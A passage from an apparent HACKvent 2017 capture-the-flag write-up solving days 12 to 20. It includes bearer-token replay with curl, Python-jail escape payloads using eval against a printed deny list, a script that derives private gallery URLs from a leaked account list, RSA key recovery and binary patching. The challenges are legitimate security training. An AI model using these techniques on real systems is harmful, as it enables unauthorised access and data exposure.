HTTP\/1.1 302 Found\nServer: Apache-Coyote\/1.1\nX-Frame-Options: DENY\nPragma: no-cache\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\nCache-Control: no-cache\nCache-Control: no-store\nLocation: http:\/\/transporter.hacking-lab.com\/client#access_token=eyJraWQiOiJyc2ExIiwiYWxnIjoiUlMyNTYifQ.eyJzdWIiOiJzYW50YSIsImF6cCI6ImE3NWI0NzIyLTE0MWQtNGMwMC1iNjVjLTVkYzI3OTE0NmI2MCIsImlzcyI6Imh0dHA6XC9cL2NoYWxsZW5nZXMuaGFja3ZlbnQuaGFja2luZy1sYWIuY29tOjcyNDBcL2dpZnRsb2dpc3RpY3NcLyIsImV4cCI6MTUyNjkzNjkzNiwiaWF0IjoxNTExMzg0OTM2LCJqdGkiOiI4MTlmNWYzZC1hN2M3LTQ0YTktYmI5Ni0wZmQ4MmY0YjdlNzUifQ.U9Hv66701DtUb8zeqOo45JVbzC3yhKJhsQ_q7N20rdLn5-uovYzMWjhxY8I9oPQkv3s5iDDsx1GIUbnOkC8l__oj_uqptG0BPbRfD2K1blKpbXQt3yxD1pB63aHw5LRAp10ia0MNe8_eo-qzi9d58CVYY_XOtTRH8Ic_tP5lpXVaImi8miYFY2XqR1TuFM-cUjIMUYT9Ik8rwZAEbLO_1UAWPuQUpi0_Z6N0r3hKoIRSlknmmg8A5PunL2I0qFyICUm0cqb4fieBZ34R4117LmyQY_XvzKogIaLegDIgbp22hTGHPAdziEloYYaP5uc_aEnfo0eNvY7QLPNy1dDs-Q&token_type=Bearer&state=e6ec344ec594&expires_in=15551999&id_token=eyJlbmMiOiJBMjU2R0NNIiwiYWxnIjoiUlNBMV81In0.AjFhnIaX-LLVpdJDMOvkK4MbTreuz3rdAwUfim8NsErrh238expG4O9tazr8gqZep9lCbHpieqiFRD8yRhF1-BA-EdmV9zO_Ilerrtfra1_AC5ozYV6wt1nK7cyzUm77mdpEzRZ9yhlMLrvk6FSh0lxlO6XwbJq6AL_KUsZza0kgsNVdUw3EsoAKYwZhVuzIgCLEQ1McRpEoCE9KESjKEgOgf0XoLZN-kqEARMujJH9OpCgIXIsR7ypew7Wp6W2cjWVkedjY2yaofOzedJyP7brZzX_zzPfCHey5dqW4TOlRaMlLaQ5sWIOcA2-HpsIJExoKXWRW0LIdJFS8VPKF4Q.WZtAImcXGL4EjUfw.1s2sKvRDX93EIL529djgN873OjnSXwdhB5FU5QKGt-8c0Qh-FijdssQ_6Mykgazydj8NyxCi0e5H1GogRCiv8ibchvwi4gXdQIeMXUIomHYyn2LuXS5lkARLqPzJIbv_j60NiEbdc1K9t8YuO_jnK1aajoNq2CIsgNRDxfIgbA7TZ8-GWU-Z1dItv2g7-3Ks9pwG2nUnmP0bqifYb9dae5bZe_oS5wBiHdQh43VQFPigY4G7r1dASpG3rnm_v6uqcET96dxN6AECwhW4SFQZKUoGlgv9JkG7HrUjoYbygmE1H3yrNBHQlRxnuWDxLWffsnpoGEVuZEBLyUxNA07t42NomgAdxWAlNvlrSd2veArpX2iEL_0K1u1oHe8_fkWfyWugqu39kuOeCGh2FULM0B-F8nzM6pQIN62uqwiJVJ0.0DDYtfSSe8eq10KFJ2agXw\nContent-Language: en\nContent-Length: 0\nDate: Wed, 22 Nov 2017 21:08:57 GMT<\/pre>\n
– I tried to use this token to access the website. It is a bearer token type, so I generated this GET Request:<\/p>\n
GET \/giftlogistics\/ HTTP\/1.1\nHost: challenges.hackvent.hacking-lab.com:7240\nAuthorization: Bearer eyJraWQiOiJyc2ExIiwiYWxnIjoiUlMyNTYifQ.eyJzdWIiOiJzYW50YSIsImF6cCI6ImE3NWI0NzIyLTE0MWQtNGMwMC1iNjVjLTVkYzI3OTE0NmI2MCIsImlzcyI6Imh0dHA6XC9cL2NoYWxsZW5nZXMuaGFja3ZlbnQuaGFja2luZy1sYWIuY29tOjcyNDBcL2dpZnRsb2dpc3RpY3NcLyIsImV4cCI6MTUyNjkzNjkzNiwiaWF0IjoxNTExMzg0OTM2LCJqdGkiOiI4MTlmNWYzZC1hN2M3LTQ0YTktYmI5Ni0wZmQ4MmY0YjdlNzUifQ.U9Hv66701DtUb8zeqOo45JVbzC3yhKJhsQ_q7N20rdLn5-uovYzMWjhxY8I9oPQkv3s5iDDsx1GIUbnOkC8l__oj_uqptG0BPbRfD2K1blKpbXQt3yxD1pB63aHw5LRAp10ia0MNe8_eo-qzi9d58CVYY_XOtTRH8Ic_tP5lpXVaImi8miYFY2XqR1TuFM-cUjIMUYT9Ik8rwZAEbLO_1UAWPuQUpi0_Z6N0r3hKoIRSlknmmg8A5PunL2I0qFyICUm0cqb4fieBZ34R4117LmyQY_XvzKogIaLegDIgbp22hTGHPAdziEloYYaP5uc_aEnfo0eNvY7QLPNy1dDs-Q\nUser-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko\/20100101 Firefox\/56.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\nAccept-Language: en-US,en;q=0.7,de;q=0.3\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nCache-Control: max-age=0<\/pre>\n
– But the page still showed the login button and I didn’t get any more information.. I tried to submit the bearer token in different ways, but none worked. The Lifetime of the token is long enough though, it should still work..
\n– Then the OpenID configuration I’ve found in the beginning came back to my mind. And there were some API calls, like userinfo:
\nhttp:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/userinfo
\n– Calling this API endpoint revealed the flag<\/p>\n
$ curl -H 'Authorization: Bearer eyJraWQiOiJyc2ExIiwiYWxnIjoiUlMyNTYifQ.eyJzdWIiOiJzYW50YSIsImF6cCI6ImE3NWI0NzIyLTE0MWQtNGMwMC1iNjVjLTVkYzI3OTE0NmI2MCIsImlzcyI6Imh0dHA6XC9cL2NoYWxsZW5nZXMuaGFja3ZlbnQuaGFja2luZy1sYWIuY29tOjcyNDBcL2dpZnRsb2dpc3RpY3NcLyIsImV4cCI6MTUyNjkzNjkzNiwiaWF0IjoxNTExMzg0OTM2LCJqdGkiOiI4MTlmNWYzZC1hN2M3LTQ0YTktYmI5Ni0wZmQ4MmY0YjdlNzUifQ.U9Hv66701DtUb8zeqOo45JVbzC3yhKJhsQ_q7N20rdLn5-uovYzMWjhxY8I9oPQkv3s5iDDsx1GIUbnOkC8l__oj_uqptG0BPbRfD2K1blKpbXQt3yxD1pB63aHw5LRAp10ia0MNe8_eo-qzi9d58CVYY_XOtTRH8Ic_tP5lpXVaImi8miYFY2XqR1TuFM-cUjIMUYT9Ik8rwZAEbLO_1UAWPuQUpi0_Z6N0r3hKoIRSlknmmg8A5PunL2I0qFyICUm0cqb4fieBZ34R4117LmyQY_XvzKogIaLegDIgbp22hTGHPAdziEloYYaP5uc_aEnfo0eNvY7QLPNy1dDs-Q' http:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/userinfo\n{\"sub\":\"HV17-eUOF-mPJY-ruga-fUFq-EhOx\",\"name\":\"Reginald Thumblewood\",\"preferred_username\":\"santa\"}<\/pre>\n
HV17-eUOF-mPJY-ruga-fUFq-EhOx<\/strong><\/p>\n
\n
\"\"Day 13: muffin_asm (Author: muffinX)<\/h1>\n
As M. said, kind of a different architecture!<\/em><\/p>\n

\nDescription<\/strong>
\nohai \\o\/
\nHow about some custom asm to obsfucate the codez?<\/p>\n
Download<\/a><\/p>\n
Solution
\n<\/strong>After fiddling a bit and adding debug messages to the script I’ve found out how it works. The “_cmp” function compares the user input “chr(r[r1])” against the flag I am looking for. The only thing to do was to add a print function there and to always return true, then it printed the whole flag. To make it a bit easier to read I saved every character to a global var and printed it at once when I had the full flag.<\/p>\n
#!\/usr\/bin\/env python\nimport sys, struct\nip, r, f = 0x00, [0x00]*4, [False]\nflag = \"\"\ndef _add(r1, r2): r[r1] = ((r[r1] + r[r2]) & 0xFF)\ndef _addv(r1, v): r[r1] = ((r[r1] + v) & 0xFF)\ndef _sub(r1, r2): r[r1] = ((r[r1] - r[r2]) & 0xFF)\ndef _subv(r1, v): r[r1] = ((r[r1] - v) & 0xFF)\ndef _xor(r1, r2): r[r1] = (r[r1] ^ r[r2])\ndef _xorv(r1, v): r[r1] = (r[r1] ^ v)\ndef _cmp(r1, r2): f[0] = (r[r1] == r[r2]); global flag; flag += chr(r[r2]); f[0] = True ##print(chr(r[r1]) + \" -- \"  + chr(r[r2]));\ndef _cmpv(r1, v): f[0] = (r[r1] == v)\ndef _je(o): global ip; ip = (o if f[0] else ip)\ndef _jne(o): global ip; ip = (o if not f[0] else ip)\ndef _wchr(r1): sys.stdout.write(chr(r[r1]))\ndef _rchr(r1): r[r1] = ord(sys.stdin.read(1))\nins = [_add, _addv, _sub, _subv, _xor, _xorv, _cmp, _cmpv, _je, _jne, _wchr, _rchr]\ndef run(codez):\n    global ip\n    while ip < len(codez):\n        c_ins = ins[ord(codez[ip])]\n        if c_ins in [_je, _jne]:\n            old_ip = ip\n            c_ins(struct.unpack('<I', codez[(ip+1):(ip+5)])[0])\n            if old_ip == ip: ip += 5\n            continue\n        num_of_args = c_ins.func_code.co_argcount\n        if num_of_args == 0: c_ins()\n        elif num_of_args == 1: c_ins(ord(codez[ip+1]))\n        else: c_ins(ord(codez[ip+1]), ord(codez[ip+2]))\n        ip += (1 + num_of_args)\nprint '[ muffin asm ]'\nprint 'muffinx: Did you ever codez asm?'\nrun('<REMOVED_FOR_READABILITY>')\nprint '[+] Here is the solution :>\\n' + flag<\/pre>\n
$ python muffin_asm_mod.py\n[ muffin asm ]\nmuffinx: Did you ever codez asm?\n<< flag_getter v1.0 >>\nohai, gimmeh flag: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n[+] valid! by muffinx :D if you liked the challenge, troll me @ twitter.com\/muffiniks =D\n[+] Here is the solution :>\nHV17-mUff!n-4sm-!s-cr4zY<\/pre>\n
HV17-mUff!n-4sm-!s-cr4zY<\/strong><\/p>\n
\n
\"\"Day 14: Happy Cryptmas (Author: HaRdLoCk)<\/strong><\/h1>\n
 
\n
\nDescription<\/strong>
\nTodays gift was encrypted with the attached program. try to unbox your xmas present.<\/p>\n
Flag:
\n7A9FDCA5BB061D0D638BE1442586F3488B536399BA05A14F
\nCAE3F0A2E5F268F2F3142D1956769497AE677A12E4D44EC72
\n7E255B391005B9ADCF53B4A74FFC34C<\/p><\/blockquote>\n
Download<\/a><\/p>\n
Solution
\n<\/strong>To reverse engineer this binary is pretty easy. There is not much going on in the program and you can see that there is a call to the function “powmod” in the library “libgmp” .
\n\"\"<\/a>
\nSimplified:<\/p>\n
a = 0xF66EB887F2B8A620FD03C7D0633791CB4804739CE7FE001C81E6E02783737CA21DB2A0D8AF2D10B200006D10737A0872C667AD142F90407132EFABF8E5D6BD51\nb = 65537\n__gmpz_powm(return, input, b, a);<\/pre>\n
This calculates “input * b % a”. I’ve spent way to much time on this and wanted to solve the equation myself (was in the math-mood after HaRdLoCks last challenges! \ud83d\ude42 )… Until I’ve figured out this is the RSA implementation!!
\nI started to fresh up my knowledge about the theory of RSA:
\nhttps:\/\/brilliant.org\/wiki\/rsa-encryption\/<\/a>
\nEverything is pretty straight forward, only that I don’t have the private key?! And RSA is based on the principle, that you cannot factorize large numbers. Then I found this pretty little website: http:\/\/factordb.com\/<\/a>. Somebody already did the factorization for us:<\/p>\n
n = 0xF66EB887F2B8A620FD03C7D0633791CB4804739CE7FE001C81E6E02783737CA21DB2A0D8AF2D10B200006D10737A0872C667AD142F90407132EFABF8E5D6BD51\nq = 18132985757038135691<\/pre>\n
Now I was able to calculate all the missing variables<\/p>\n
e = 65537\nn = 0xF66EB887F2B8A620FD03C7D0633791CB4804739CE7FE001C81E6E02783737CA21DB2A0D8AF2D10B200006D10737A0872C667AD142F90407132EFABF8E5D6BD51\nq = 18132985757038135691\np = 711781150511215724435363874088486910075853913118425049972912826148221297483065007967192431613422409694054064755658564243721555532535827\nn2 = (p-1)*(q-1) = 12906717464348092265244629060349066959825836365560827526746812703342315470079490199626403833118069465749256760657457871243234163897200332638336853174229940\nd = modinv(e, n2) = 11903318995073430164577503847683267546359967676384752694991086766489406467225300923841785563594951777603744100701253775023018437436479889304154234700349513<\/pre>\n
The function to decrypt is:<\/p>\n
m^d % n\n0x7A9FDCA5BB061D0D638BE1442586F3488B536399BA05A14FCAE3F0A2E5F268F2F3142D1956769497AE677A12E4D44EC727E255B391005B9ADCF53B4A74FFC34C**d%n<\/pre>\n
The only problem here is, that python is very slow in solving this. Using the pow() function solved the problem.<\/p>\n
# Encrypted message\nenc=0x7A9FDCA5BB061D0D638BE1442586F3488B536399BA05A14FCAE3F0A2E5F268F2F3142D1956769497AE677A12E4D44EC727E255B391005B9ADCF53B4A74FFC34C\n# Given variables from reversing the binary\ne = 65537\nn = 0xF66EB887F2B8A620FD03C7D0633791CB4804739CE7FE001C81E6E02783737CA21DB2A0D8AF2D10B200006D10737A0872C667AD142F90407132EFABF8E5D6BD51\n# q & p\n# http:\/\/factordb.com\/\nq = 18132985757038135691\np = 711781150511215724435363874088486910075853913118425049972912826148221297483065007967192431613422409694054064755658564243721555532535827\ndef egcd(a, b):\n    if a == 0:\n        return (b, 0, 1)\n    else:\n        g, y, x = egcd(b % a, a)\n        return (g, x - (b \/\/ a) * y, y)\ndef modinv(a, m):\n    g, x, y = egcd(a, m)\n    if g != 1:\n        raise Exception('modular inverse does not exist')\n    else:\n        return x % m\ndef encrypt(e, n, message):\n    return pow(int(message.encode(\"hex\"), 16), e, n)\ndef decrypt(d, n, message):\n    res = pow(message, d, n)\n    return '{0:02x}'.format(res).decode(\"hex\")\n# Calculate missing variables\n# https:\/\/brilliant.org\/wiki\/rsa-encryption\/\nn2 = (p-1)*(q-1) #12906717464348092265244629060349066959825836365560827526746812703342315470079490199626403833118069465749256760657457871243234163897200332638336853174229940\nd = modinv(e, n2) #11903318995073430164577503847683267546359967676384752694991086766489406467225300923841785563594951777603744100701253775023018437436479889304154234700349513\n# Try run\nhv_en = encrypt(e, n, \"HV17\")\nhv_pl = decrypt(d, n, hv_en)\nprint(\"[+] Encrypted 'HV17': '\" + \"0x\" + str(format(hv_en,\"02x\")) + \"'\")\nprint(\"[+] Decrpyted '\" + \"0x\" + str(format(hv_en,\"02x\")) + \"': '\" + str(hv_pl) +\"'\")\n# Decrypt the actual flag\nprint(\"[+] Decrypt encrypted flag '\" + str(enc) +\"':\")\nflag = decrypt(d, n, enc)\nprint(\"--> \" + flag)<\/pre>\n
HV17-5BMu-mgD0-G7Su-EYsp-Mg0b<\/strong><\/p>\n
\n
\"\"Day 15: Unsafe Gallery (Author: inik)<\/h1>\n
See pictures you shouldn’t see<\/em><\/p>\n

\nDescription<\/strong>
\nThe List of all Users of the Unsafe Gallery was leaked (See account list<\/a>).
\nWith this list the URL to each gallery can be constructed. E.g. you find Danny’s gallery here<\/a>.
\nNow find the flag in Thumper’s gallery.
\nSolution<\/strong>
\nI didn’t like this challenge, because it was depending too much on guessing. With the given example it was possible to focus on two Dannys in the CSV file. After a lot of trial & error I managed to find the right combination.
\nThe email address field was hashed with SHA-256 and then Base64 encoded. All non alphanumeric characters were removed from the Base64 string, and the result of this was the URL.
\nHere is the python script to solve the challenge:<\/p>\n
import csv\nimport base64\nimport hashlib\nimport re\nimport urllib\nurl_hash=\"bncqYuhdQVey9omKA6tAFi4rep1FDRtD4H8ftWiw\"\nLINK = \"http:\/\/challenges.hackvent.hacking-lab.com:3958\/gallery\/\"\naccounts = []\nwith open('accounts.csv', 'r') as f:\n  reader = csv.reader(f)\n  accounts = list(reader)\ndef compute_url(field):\n    regex = re.compile('[^a-zA-Z0-9]')\n    res = regex.sub(\"\", base64.b64encode(hashlib.sha256(field).digest()))\n    return res\ndef find_flag(url_hash):\n    li = LINK + url_hash\n    f = urllib.urlopen(li)\n    flag = f.read()\n    if not \"HV17-\" in flag:\n        return None\n    else:\n        i = flag.index(\"HV17\")\n        return flag[i:i+29]\ndef get_account_by_name(name):\n    res = []\n    for x in accounts:\n        if x[1] == name:\n            res.append(x)\n    return res\n# Find the right account & Field\ndannys = get_account_by_name(\"Danny\")\nfor x in dannys:\n    for y in x:\n        url = compute_url(y)\n        if url == url_hash:\n            print(\"[+] URL for field '\" + y + \"' matches: \" + url)\n            print(\"Account: \" + str(x))\n            print(\"---------------------------\")\n            break\n# Find the right Thumper!\nthumpers = get_account_by_name(\"Thumper\")\nfor x in thumpers:\n    url_hash = compute_url(x[6])\n    flag = find_flag(url_hash)\n    if flag:\n        print(\"[+] Found our Flag!\")\n        print(\"[+] \" + LINK + url_hash)\n        print(\"[+] \" + x[6])\n        print(\"--> \" + flag)<\/pre>\n
$ python sol.py\n[+] URL for field 'Danny.Dixon@sunflower.org' matches: bncqYuhdQVey9omKA6tAFi4rep1FDRtD4H8ftWiw\nAccount: ['32009', 'Danny', 'Dixon', '484 Cliffwood Boulevard', '75876', 'Crescent', 'Danny.Dixon@sunflower.org', '44967219', 'gold', '15', '1', '39', '91819254', '128486', 'active']\n---------------------------\n[+] Found our Flag!\n[+] http:\/\/challenges.hackvent.hacking-lab.com:3958\/gallery\/37qKYVMANnIdJ2V2EDberGmMz9JzS1pfRLVWaIKuBDw\n[+] Thumper.Lee@gmx.com\n--> HV17-el2S-0Td5-XcFi-6Wjg-J5aB<\/pre>\n
HV17-el2S-0Td5-XcFi-6Wjg-J5aB<\/strong><\/p>\n
\n
\"\"Day 16: Try to escape … (Author: pyth0n33)<\/strong><\/h1>\n
… from the snake cage<\/em><\/p>\n

\nDescription<\/strong>
\nSanta programmed a secure jail to give his elves access from remote. Sadly the jail is not as secure as expected.<\/p>\n
nc challenges.hackvent.hacking-lab.com 1034<\/p>\n
Solution
\n<\/strong>Very entertaining challenge. I assume there were many different ways to solve this challenge. I don’t think it is possible for the author to just allow one possible path in such an environment.
\nWhen connecting to the server some nice ASCII art is shown, a message and a python command prompt:<\/p>\n
The flag is stored super secure in the function SANTA!\n>>> a =<\/pre>\n
After playing around a bit with the python jail I made some discoveries:
\n– Everything entered gets transformed to lowercase
\n– There are some denied characters and functions<\/p>\n
>>> a = x\nDenied<\/pre>\n
– There are allowed functions as well<\/p>\n
>>> a = 1\n>>> a = print(a)\n1<\/pre>\n
– ‘Denied’ is a list with blacklisted functions and I could print it!<\/p>\n
>>> a = print(denied)\n['import', 'upper', 'lower', 'open', 'exit', 'compile', 'chr', '__import__', 'object', 'assert', '__builtins__', 'exec', 'pper', 'per']<\/pre>\n
– I was able to use these functions: a=denied[0]
\n– I had the eval() function, which can execute code. And I had the upper() function.
\nNow I was able to create SANTA().<\/p>\n
>>> a = eval(\"'santa'.\"+DENIED[1]+\"()\")+\"()\"\n>>> a = print(a)\nSANTA()<\/pre>\n
With eval() it is possible to execute SANTA().<\/p>\n
>>> a = print(eval(eval(\"'santa'.\"+DENIED[1]+\"()\")+\"()\"))\nNo flag for you!<\/pre>\n
\ud83d\ude41 And I thought I already solved the challenge before this point… So, I started to play with arguments for the SANTA() function.<\/p>\n
>>> a = print(eval(eval(\"'santa'.\"+DENIED[1]+\"()\")+\"('A')\"))\n<\/pre>\n
This returned some non-printable characters. I tried to input more characters:<\/p>\n
>>> a = print(eval(eval(\"'santa'.\"+DENIED[1]+\"()\")+\"('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')\"))\n\u0018\u0004ca}\u0018fg<7%3f&c76{'f(,}a3%)<\/pre>\n
OK, I definitely got something, lets try out numbers instead of ‘A’s.<\/p>\n
>>> a = print(eval(eval(\"'santa'.\"+DENIED[1]+\"()\")+\"('00000000000000000000000000000000000000000000000')\"))\nIU20,I76m.ftb7.w2fg*v7y},0btx<\/pre>\n
This already looks like our flag, but still encoded\/encrypted somehow. I started to change my input, character by character and was able to construct ‘HV17’ with<\/p>\n
1337! >>> a = print(eval(eval(\"'santa'.\"+DENIED[1]+\"()\")+\"('13371337133713371337133713371337')\"))\nHV17-J41l-esc4-p3ed-w4zz-3asy<\/pre>\n
Later on I’ve found an alternative method to solve this challenge. It is also possible to use the title function to construct “SANTA()”.<\/p>\n
>>> a = print(eval(\"s\".title()+\"a\".title()+\"n\".title()+\"t\".title()+\"a\".title()+\"('1337133713371337133713371337133713371337')\"))\nHV17-J41l-esc4-p3ed-w4zz-3asy<\/pre>\n
HV17-J41l-esc4-p3ed-w4zz-3asy<\/strong><\/p>\n
\n
\"\"Day 17: Portable NotExecutable (Author: HaRdLoCk)<\/h1>\n
 
\n
\nDescription
\n<\/strong>here is your flag.
\nbut wait – its not running, because it uses the new Portable NotExecutable Format. this runs only on Santas PC. can you fix that?<\/p>\n
get the flag here<\/a><\/p>\n
Solution
\n<\/strong>This executable is not running correctly, apparently the header is broken and the challenge is to fix it. First I had to read about the PE file format. These links helped a lot:
\nPE101.png<\/a>
\nhttps:\/\/msdn.microsoft.com\/en-us\/library\/ms809762.aspx<\/a>
\nThe PEView tool is very helpful as it parses the file and shows the header information. https:\/\/www.aldeid.com\/wiki\/PEView<\/a>
\nIn the end it was to read up the specifications and find the errors in the header. Finally, I had to make 4 modifications to make the executable run.
\n– Change the e_magic number to 4D5A (Address: 0x00)
\n– Change the e_lfanew number from 0x20 to 0x40 (Address: 0x3C)
\n– Change PNE to PE00 –> 504e4500 to 50450000 (Address: 0x40)
\n– There are only 4 sections, so change 6 sections to 4 (Address: 0x46)
\nThis still didn’t reveal the right flag. And for every tiny modification I did, the printed flag was a new one. Therefore, I tried to modify only what was really needed.
\nWhen running strings over the file, there was this hint:<\/p>\n
$ strings Portable_NotExecutable.exe | grep HV17\nHV17\nHV17-GasR-zkb3-cVd9-KdAP-txi is almost good. but why the black window?<\/pre>\n
I assumed that I have to get rid of the DOS window which opens when the executable is running. Fortunately I did exactly this for another purpose some weeks back. To do so I had to set the “image_optional_header_subsystem” at the address 09c from windows_cui to windows_gui. This means to change the value from 3 to 2.
\nAll the modifications:
\n\"\"<\/a>
\nExecuting the modified EXE file the right flag is printed:
\nHV17-VIQn-oHcL-hVd9-KdAP-txiK<\/strong><\/p>\n
\n
\"\"Day 18: I want to play a Game (Reloaded) (Author: HaRdLoCk)<\/h1>\n
 
\n
\nDescription<\/strong>
\nlast year we played some funny games together – do you remember? ready for another round?
\ndownload the game here and play until you find the flag.<\/p>\n
get the game<\/a><\/p>\n
Solution
\n<\/strong>I always struggle a bit with Reverse Engineering challenges. But it’s HACKvent, here we go.
\nThe rpcs3 Playstation 3 emulator<\/a> was a real help for this challenge. The game didn’t start at first, but after looking around I noticed that if I load the hackvent.self binary the game starts and it reveals the hidden flag number 2!
\n\"\"<\/a>HV17-Muq9-gzvU-t3Bg-O3jo-iGml<\/strong>
\nI analyzed the files and found some useful information:<\/p>\n
    \n
  1. hackvent.self is encrypted and signed. Therefore it can be run. It also can be decrypted with TrueAncestor.<\/li>\n
  2. EBOOT.BIN is almost the same like the unencrypted hackvent.self file. There are some differences and it contains debug information. The instructions and addresses are the same!<\/li>\n
  3. We cannot make EBOOT.BIN run, I tried to sign it with TrueAncestor, but the file is somehow broken.<\/li>\n
  4. The hint says we should follow the flag in the unsigned binary (EBOOT.BIN), so there must be some differences between the unsigned and signed binaries.<\/li>\n
  5. I assumed, the unsigned binary does exactly the same like the signed one, but reveals the real flag in the end.<\/li>\n<\/ol>\n
    I reverse engineered the EBOOT.BIN file with Hopper. Eventually I’ve found out, that the magic is happening in the function .drawScene.
    \n    \"\"<\/a> \"\"<\/a> \"\"<\/a> \"\"<\/a>
    \nAfter several attempts to use the debugger of rpcs3 I was finally able to step through the drawScene function. Of course there was not the right data, but it helped a lot to understand the function.
    \nThe data which is used lays at the addresses 0x40040, 0x4005d and 0x4007a. I tried to completely understand the function, but I am really slow in reversing! At 23:40 I decided to patch the decrypted hackvent.elf file and resign it with TrueAncestor. So I could run it with the “real” data. I replaced the data at the three addresses mentioned above with hexedit.
    \nDiff:
    \n    \"\"<\/a>
    \nThen I re-signed the file and ran it again. And there it is, the right flag.
    \n    \"\"<\/a>
    \nI was able to submit the correct flag at 23:59:54!!! 6 seconds later and I would not have received the full points!
    \nHV17-5mJ3-yxcm-WiUX-nZgW-e0lT<\/strong><\/p>\n
    \n
    \"\"Day 19: Cryptolocker Ransomware (Author: Dykcik)<\/h1>\n
    Pay the price, Thumper did it already!<\/em><\/p>\n

    \nDescription<\/strong>
    \nThis flag has been taken for ransom. Transfer 10’000 Szabo to 0x1337C8b69bcb49d677D758cF541116af1F2759Ca<\/b> with your HACKvent username (case sensitive) in the transaction data to get your personal decryption key. To get points for this challenge, enter the key in the form below.
    \nDisclaimer: No need to spend r34l m0n3y!<\/b>
    \nEnter your 32-byte decryption key here. Type it as 64 hexadecimal characters without 0x at the beginning.
    \nSolution<\/strong>
    \nI had the idea to make a blockchain CTF challenge myself. I was very excited to solve this one!
    \nAccording to the description I knew that it was a smart contract hosted in the Ethereum blockchain. All blockchain transactions and contracts in Ethereum can be publicly viewed. The bytecode of the contract is     here<\/a>:<\/p>\n
    0x6060604052600436106100405763ffffffff7c0100000000000000000000000000000000000000000000000000000000600035041663ea8796348114610154575b662386f26fc100003410610152577fec29ee18c83562d4f2e0ce62e38829741c2901da844c015385a94d8c9f03d486600260003660116000604051602001526040517f485631372d00000000000000000000000000000000000000000000000000000081526005810184848082843782019150508260ff167f0100000000000000000000000000000000000000000000000000000000000000028152600101935050505060206040518083038160008661646e5a03f1151561010157600080fd5b5050604051805190506040519081526040602082018190526011818301527f596f7572206b657920697320686572652e00000000000000000000000000000060608301526080909101905180910390a15b005b341561015f57600080fd5b61015260005473ffffffffffffffffffffffffffffffffffffffff9081169030163180156108fc0290604051600060405180830381858888f1935050505015156101a857600080fd5b5600a165627a7a7230582020304ba8cb5786445e5c47f840741111591a38057d40ac139568b31f9eaee3c70029<\/pre>\n
    The transaction made from Thumper can be found here<\/a>:
    \n    \"\"<\/a>
    \nAnd Thumpers key can be found in the     event logs<\/a>:
    \n    \"\"<\/a>
    \nReverse engineering an Ethereum contract is pretty hard. A better solution is, to run the contract in a private blockchain and trigger it by sending a transaction to it. To do so I used     ethereumjs-vm<\/a>. I extended the example of the simple transactions:<\/p>\n
    $ npm install ethereumjs-vm\n$ cd ethereumjs-vm\/examples\/run-transactions-simple\/<\/pre>\n
    And then I modified the index.js:<\/p>\n
    var Buffer = require('safe-buffer').Buffer \/\/ use for Node.js <4.5.0\nvar VM = require('..\/..\/index.js')\n\/\/ create a new VM instance\nvar vm = new VM()\nvar code = '6060604052600436106100405763ffffffff7c0100000000000000000000000000000000000000000000000000000000600035041663ea8796348114610154575b662386f26fc100003410610152577fec29ee18c83562d4f2e0ce62e38829741c2901da844c015385a94d8c9f03d486600260003660116000604051602001526040517f485631372d00000000000000000000000000000000000000000000000000000081526005810184848082843782019150508260ff167f0100000000000000000000000000000000000000000000000000000000000000028152600101935050505060206040518083038160008661646e5a03f1151561010157600080fd5b5050604051805190506040519081526040602082018190526011818301527f596f7572206b657920697320686572652e00000000000000000000000000000060608301526080909101905180910390a15b005b341561015f57600080fd5b61015260005473ffffffffffffffffffffffffffffffffffffffff9081169030163180156108fc0290604051600060405180830381858888f1935050505015156101a857600080fd5b5600a165627a7a7230582020304ba8cb5786445e5c47f840741111591a38057d40ac139568b31f9eaee3c70029'\nvar hexString;\nvar byteArray;\nfunction toHexString(byteArray) {\n    return Array.prototype.map.call(byteArray, function(byte) {\n        return ('0' + (byte & 0xFF).toString(16)).slice(-2);\n    }).join('');\n}\nvm.on('step', function (data) {\n})\nvm.runCode({\n    code: Buffer.from(code, 'hex'),\n    gasLimit: Buffer.from('ffffffff', 'hex'),\n    value: 10000000000000000, \/\/0.01 Ether\n    \/\/data: Buffer.from('5468756d706572', 'hex') \/\/Thumper\n    data: Buffer.from('6d636961', 'hex') \/\/mcia\n}, function (err, results) {\n    hexString = toHexString(results.logs[0][2])\n    console.log(\"[+] There is your key:\")\n    console.log(\"--> \" + hexString.substr(0,64))\n    \/\/console.log('returned: ' + results.return.toString('hex'))\n    \/\/console.log('gasUsed: ' + results.gasUsed.toString())\n    console.log(err)\n})<\/pre>\n
    I ran the code locally and when I browsed to the URL I received my key to solve the challenge:<\/p>\n
    0e9c15654854f594610d8331195e578601ed3f406ad0ed821bb4f7af84cff38d<\/pre>\n
    \n
    \"\"Day 20: linux malware (Author: muffinX)<\/h1>\n
    oh boy, this will go wrong… =D<\/em><\/p>\n

    \nDescription<\/strong>
    \nohai<\/b> my name is muffinx…
    \n…um yeah btw. cyberwar just started and you should just pwn everyone?
    \nMake sure you don’t leave traces and make the lifes of your opponents harder, but fairplay!
    \nYou are a hacker? Then think like a hacker!
    \nAttack! Defend! And trick!<\/b>
    \nLadies and gentlemen,
    \nWe understand that you
    \nHave come tonight
    \nTo bear witness to the sound
    \nOf drum And Bass
    \nWe regret to announce
    \nThat this is not the case,
    \nAs instead
    \nWe come tonight to bring you
    \nThe sonic recreation of the end of the world.
    \nLadies and gentlemen,
    \nPrepare
    \nTo hold
    \nYour
    \nColour
    \nOK.
    \nFuck it,
    \nI lied.
    \nIt’s drum and bass.
    \nWhat you gonna do?<\/p>\n
    WARNING:<\/p>\n
    \n
    RUN INSIDE VM, THIS CONTAINER MAYBE DANGEROUS FOR YOUR SYSTEM,
    \nWE TAKE NO RESPONSIBILITY<\/p><\/blockquote>\n
    You should keep the container inside the same host your haxxing on (same ip) or some things will not work…<\/p>\n
    https:\/\/hub.docker.com\/r\/muffinx\/hackvent12_linux_malware\/<\/a><\/p>\n
    Hint #1:<\/b> check https:\/\/hub.docker.com\/r\/muffinx\/hackvent17_linux_malware\/ for regular updates, keep the container running (on the same ip) when you are haxxing the bot panel
